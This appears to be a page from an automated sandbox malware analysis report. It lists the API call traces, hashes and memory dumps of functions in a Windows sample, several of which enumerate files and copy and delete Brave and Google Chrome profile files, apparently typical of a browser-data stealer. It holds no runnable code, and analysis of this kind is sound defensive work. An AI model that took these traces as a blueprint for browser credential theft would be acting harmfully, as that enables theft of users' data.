                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 4a5b45acc7e4086dbd37e69497cd50bce968396abbc29ccd48c4b9a6dff71e98
                          • Instruction ID: 13e9f5c55128b42a54918b2a8b797b2bc4b3f7e1b34ff84a341bb135d9f01117
                          • Opcode Fuzzy Hash: 4a5b45acc7e4086dbd37e69497cd50bce968396abbc29ccd48c4b9a6dff71e98
                          • Instruction Fuzzy Hash: 1FE09264200256EBD7049BB9DC45D97FB6CBF85700704C229A5045B162DB34EC41C7D8
                          Function 00532AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2958 532ad0-532b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 532b44-532b59 2958->2959 2960 532b24-532b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00532AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00532B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00532B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: a90630f63474da38d2dd078be5f19f49a3909f678e02cf5f3dd3e38ab6130293
                          • Instruction ID: 4441bfe979a41aef234b1c318967348ef43ea0f1776ee29ffd182c1c1d29829a
                          • Opcode Fuzzy Hash: a90630f63474da38d2dd078be5f19f49a3909f678e02cf5f3dd3e38ab6130293
                          • Instruction Fuzzy Hash: BC01D676A44608ABC710CF99EC45BAEFBB8F745B21F00426BFA15D3790D778590087A1

                          Non-executed Functions

                          Function 00522390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005223D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005223F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00522402
                          • lstrlen.KERNEL32(\*.*), ref: 0052240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00522436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00522486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: fe5929698f3bba94fd98c52703abdfe391908b12435ab12ff6f8612fa97c8710
                          • Instruction ID: 98055ac241819d007cdf4b6e0f1b4d18e928a14d107e14f151f985eeb6992c29
                          • Opcode Fuzzy Hash: fe5929698f3bba94fd98c52703abdfe391908b12435ab12ff6f8612fa97c8710
                          • Instruction Fuzzy Hash: DDA2A53591162BABDB21AF74DC4CAAF7FB9BF46700F048025B905E7251DB38DD818B54
                          Function 005116A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005116E2
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051176C
                          • lstrcat.KERNEL32(00000000), ref: 00511776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005117A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005117EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005117F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511875
                          • lstrcat.KERNEL32(00000000), ref: 0051187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005118AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 005118F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005118FE
                          • lstrlen.KERNEL32(00541794), ref: 00511909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511929
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511966
                          • lstrlen.KERNEL32(\*.*), ref: 00511971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0051199A
                            • Part of subcall function 00534040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0053406D
                            • Part of subcall function 00534040: lstrcpy.KERNEL32(00000000,?), ref: 005340A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005119C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511A16
                          • lstrlen.KERNEL32(00541794), ref: 00511A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A41
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511A81
                          • lstrlen.KERNEL32(00541794), ref: 00511A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511AAC
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00511B45
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 00511B70
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00511B8A
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511C03
                          • lstrlen.KERNEL32(00541794), ref: 00511C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511C31
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511C74
                          • lstrlen.KERNEL32(00541794), ref: 00511C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511CA2
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511CAE
                          • lstrlen.KERNEL32(?), ref: 00511CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00511CE9
                          • lstrlen.KERNEL32(00541794), ref: 00511CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511D14
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511DEB
                          • lstrlen.KERNEL32(00541794), ref: 00511DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511E19
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00511E56
                          • lstrlen.KERNEL32(00541794), ref: 00511E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511E81
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00511E8D
                          • lstrlen.KERNEL32(?), ref: 00511E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 00511EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00511F45
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511F9F
                          • lstrlen.KERNEL32(011A8A20), ref: 00511FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00511FE3
                          • lstrlen.KERNEL32(00541794), ref: 00511FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051200E
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00512042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051204D
                          • lstrlen.KERNEL32(00541794), ref: 00512058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512075
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00512081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: b4ce9d0dfe56e4d4f6cd707211fe49a757b332bc42388a2dea79762bb5275e21
                          • Instruction ID: a1c277aed5855723a5de6952e02a58f66c0c1d365d8d324b9d91f3b16892ffeb
                          • Opcode Fuzzy Hash: b4ce9d0dfe56e4d4f6cd707211fe49a757b332bc42388a2dea79762bb5275e21
                          • Instruction Fuzzy Hash: 24929B3591161B9BEB21AFA4DC88AEF7FB9BF81700F044165FA05A7211DB349DC1CBA4
                          Function 0051DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DBEF
                          • lstrlen.KERNEL32(00544CA8), ref: 0051DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DC17
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 0051DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DC4C
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DC8F
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0051DCD0
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0051DCF0
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0051DD0A
                          • lstrlen.KERNEL32(0053CFEC), ref: 0051DD1D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DD7B
                          • lstrlen.KERNEL32(00541794), ref: 0051DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DDA3
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DDAF
                          • lstrlen.KERNEL32(?), ref: 0051DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0051DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DE19
                          • lstrlen.KERNEL32(00541794), ref: 0051DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051DE6F
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DE7B
                          • lstrlen.KERNEL32(011A8840), ref: 0051DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DEBB
                          • lstrlen.KERNEL32(00541794), ref: 0051DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051DEE6
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DEF2
                          • lstrlen.KERNEL32(011A8A80), ref: 0051DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DFA5
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051DFB1
                          • lstrlen.KERNEL32(011A8840), ref: 0051DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051DFF4
                          • lstrlen.KERNEL32(00541794), ref: 0051DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E022
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051E02E
                          • lstrlen.KERNEL32(011A8A80), ref: 0051E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0051E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0051E0E7
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E11F
                          • lstrlen.KERNEL32(011ACF20), ref: 0051E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0051E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E19F
                          • lstrcat.KERNEL32(00000000), ref: 0051E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0051E1F9
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E22F
                          • lstrlen.KERNEL32(011A8A20), ref: 0051E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E261
                          • lstrcat.KERNEL32(00000000,011A8A20), ref: 0051E269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 0051E274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0051E2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E349
                          • DeleteFileA.KERNEL32(?), ref: 0051E381
                          • StrCmpCA.SHLWAPI(?,011AD0A0), ref: 0051E3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E445
                          • StrCmpCA.SHLWAPI(?,011A8A80), ref: 0051E468
                          • StrCmpCA.SHLWAPI(?,011A8840), ref: 0051E47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0051E4E0
                          • StrCmpCA.SHLWAPI(?,011AD0D0), ref: 0051E58E
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051E5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0051E639
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E678
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E737
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0051E776
                          • DeleteFileA.KERNEL32(?), ref: 0051E7D2
                          • StrCmpCA.SHLWAPI(?,011A8A30), ref: 0051E7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051E916
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051E952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 90462745d3b91bf15712ceff75b61dd5e9c359d2a40abd42cbe1a49849abf4c3
                          • Instruction ID: 030f736cf84090c6ee5dfc31ff955ce9c0423aae3b19a390a911fd597a6fe574
                          • Opcode Fuzzy Hash: 90462745d3b91bf15712ceff75b61dd5e9c359d2a40abd42cbe1a49849abf4c3
                          • Instruction Fuzzy Hash: CC925F7591020A9BEB20EFB4DC89AEE7FB9BF85700F044529F906A7251DB34DDC58B90
                          Function 005218A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005218D2
                          • lstrlen.KERNEL32(\*.*), ref: 005218DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 005218FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0052190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00521947
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 00521967
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00521981
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005219BF
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005219F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521A4C
                          • lstrlen.KERNEL32(00541794), ref: 00521A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521A80
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521AB4
                          • lstrlen.KERNEL32(?), ref: 00521AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 00521AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521B19
                          • lstrlen.KERNEL32(011A8B70), ref: 00521B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521B8F
                          • lstrlen.KERNEL32(00541794), ref: 00521BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521BC3
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521C57
                          • lstrlen.KERNEL32(00541794), ref: 00521C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521C8B
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521D21
                          • lstrlen.KERNEL32(00541794), ref: 00521D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521D55
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00521DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521DED
                          • lstrlen.KERNEL32(00541794), ref: 00521E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521E36
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521E68
                          • lstrlen.KERNEL32(011ACFB0), ref: 00521E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521EB2
                          • lstrlen.KERNEL32(00541794), ref: 00521EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521EE3
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521F15
                          • lstrlen.KERNEL32(011AD308), ref: 00521F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521F5F
                          • lstrlen.KERNEL32(00541794), ref: 00521F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521F90
